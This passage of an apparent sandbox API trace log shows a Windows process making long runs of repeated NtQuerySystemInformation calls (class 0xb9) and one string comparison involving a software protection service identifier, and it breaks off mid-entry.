[0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x50, ResultLength=0x0) [0273.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x28, ResultLength=0x0) [0273.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0273.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd8, Length=0x50, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 